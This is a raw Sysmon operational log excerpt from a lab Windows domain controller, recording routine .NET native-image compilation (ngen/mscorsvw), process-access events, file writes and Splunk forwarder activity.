21:01:07.552{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6802-00000000CF01}7136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.552{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6802-00000000CF01}7136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000018774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.230{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61365-false10.0.1.12-8000- 23542300x800000000000000018773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.474{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48454BAAD86B4A530261B08E34B69F92,SHA256=0366A2923568DA7305658EFD241FD8F856FA70CD7CA236F204EE68BB6CF06388,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.474{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6702-00000000CF01}2080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.427{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6702-00000000CF01}2080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.427{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6702-00000000CF01}2080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.349{4DB9351A-A113-60D3-6602-00000000CF01}5480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IZQO2GMGH6\System.Drawing.Design.ni.dll.auxMD5=B19345322480F2E2BC4B763604F979F8,SHA256=6E607CA83CF2BDC4EB083F3BBE7C01821B0F87EE4619AEB6A433B2F854BB0EEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.349{4DB9351A-A113-60D3-6602-00000000CF01}5480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IZQO2GMGH6\System.Drawing.Design.ni.dllMD5=170CEFCBC68C8C437037E15CC4F6A3B6,SHA256=6BCC8F8B2A7C9D4CB3F9AB6039AF749F103B72B2F489A1DFAADC2B17CC4F6AB0,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:07.318{4DB9351A-A113-60D3-6602-00000000CF01}5480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1568-0\System.Drawing.Design.dll2021-06-23 21:01:07.318 23542300x800000000000000018766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.287{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=678BDF99AA8D0216EC8090758F3B39D4,SHA256=0847FAD8B0FDBF6862077AA3B5CA3690251B5532BD080A1F4A6AEEC7E0777A89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.021{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6602-00000000CF01}5480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.005{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6602-00000000CF01}5480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.005{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6602-00000000CF01}5480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.880{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A114-60D3-6B02-00000000CF01}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.849{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A114-60D3-6B02-00000000CF01}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.849{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A114-60D3-6B02-00000000CF01}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.755{4DB9351A-A113-60D3-6A02-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NEWXW0B0CP\System.EnterpriseServices.Wrapper.dllMD5=A08AC30FD2DA1C8BE3C3C7BE75FDFD2B,SHA256=B237D98A0720E6FB5071AB148FA81D23A66973B402EF83E32DF6EF8435E4934C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000018792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.740{4DB9351A-A113-60D3-6A02-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NEWXW0B0CP\System.EnterpriseServices.ni.dll.auxMD5=03159FDC9862F6EB36FF8B4040583B3E,SHA256=69B0577DCFCFD3B2FE87531F5A6B36A19CFD883AD7AF1CF98ED84B27DDA87086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.740{4DB9351A-A113-60D3-6A02-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NEWXW0B0CP\System.EnterpriseServices.ni.dllMD5=0F00677E276218902156F50628C49B68,SHA256=1773C9D95983AD253B4BE80D98218CBA784B945690BC5379CBF5C882A1E2E55E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:08.724{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\aec-0\System.EnterpriseServices.dll2021-06-23 21:01:08.724 11241100x800000000000000018789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:08.693{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\aec-0\System.EnterpriseServices.Wrapper.dll2021-06-23 21:01:08.693 23542300x800000000000000018788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.568{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5430EAB9002892D66C93F23E9FC9EC24,SHA256=E7E348B921D2545DDCBEE777A8DA9F6B0C7BB6C55B0CDACF79FD18CF9AFCA486,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.318{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A22FFAB9F05CCB5B5A0D1965A89C1CD9,SHA256=FE820BBFF00CB6DAE3DD5833A4B0BA4D6EED5A3925DE903F3F957A291358BB10,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.005{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.990{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.990{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.849{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C31B43822F8CC6329A01760371CB7902,SHA256=7FCCA36761F2D8F6C648617AF9004845DF02F955CEDE10178A43D1E36B29E244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.333{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FC0E0C56E8AC2F914852241DB8C7B4E,SHA256=A42A77F65533611B85123BE100F5158AC24355E7CA2CE1D868EB972A0B6B79A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.021{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A115-60D3-6C02-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.021{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A115-60D3-6C02-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.021{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A115-60D3-6C02-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:10.451{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52A80D7DCF5F498B9F9FAD4395D612FA,SHA256=BC5347BBD1F1E7ED1F8C8EA362447998BCD9D6DFD2F1FAA4EFB5B3414E77E9E3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.764{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A117-60D3-6F02-00000000CF01}6768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A117-60D3-6F02-00000000CF01}6768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 